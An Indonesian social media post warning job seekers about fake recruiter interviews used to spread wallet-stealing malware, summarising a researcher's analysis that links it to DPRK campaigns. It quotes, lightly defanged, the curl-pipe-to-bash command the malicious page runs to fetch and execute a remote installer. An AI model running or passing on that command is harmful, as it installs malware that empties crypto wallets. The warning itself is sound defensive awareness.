hati-hati terhadap wawancara kerja palsu. mereka sekarang menjadi salah satu vektor pengiriman malware paling bersih.


saudara saya hampir tertipu minggu ini.
langkah-langkahnya, langkah demi langkah:
> seorang "recruiter" menghubunginya di linkedin
> mereka benar-benar membaca cv-nya. mereka tahu tumpukan teknologi yang dia gunakan. mereka memesan slot wawancara nyata.
> beberapa jam sebelum panggilan: "bisakah kamu tinjau halaman produk kami sebentar sebelum kita bicara?"
> mengunjungi situs tersebut menjalankan ini di latar belakang:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
jika kamu mengetikkan password saat diminta, itu selesai.
seorang peneliti (Darksp33d di Github) membalikkan rekayasa binary:
> setiap string konfigurasi dienkripsi dengan 570 fungsi kustom unik
> setelah dibuka: server c2 lengkap, daftar endpoint lengkap, dan dsn pelacakan kesalahan sentry yang terhubung kembali ke pengembang di bawah panggilan hukum
> 276 id ekstensi chrome yang ditargetkan, mencakup 188 dompet crypto
> ttp tumpang tindih dengan "wawancara menular" DPRK sangat kuat
> 9/64 di virustotal. crowdstrike, sophos, malwarebytes, semuanya melewatkannya
recruiter asli, cv asli, slot wawancara asli, situs yang terlihat nyata. satu baris curl mengosongkan dompetmu.
jika seorang "recruiter" pernah meminta kamu menjalankan sesuatu di terminalmu, bahkan sesuatu yang seharusnya tidak berbahaya seperti skrip build sebelum wawancara teknologi, tutup tab tersebut.
Lihat Asli
post-image
Halaman ini mungkin berisi konten pihak ketiga, yang disediakan untuk tujuan informasi saja (bukan pernyataan/jaminan) dan tidak boleh dianggap sebagai dukungan terhadap pandangannya oleh Gate, atau sebagai nasihat keuangan atau profesional. Lihat Penafian untuk detailnya.
  • Hadiah
  • Komentar
  • Posting ulang
  • Bagikan
Komentar
Tambahkan komentar
Tambahkan komentar
Tidak ada komentar
  • Sematkan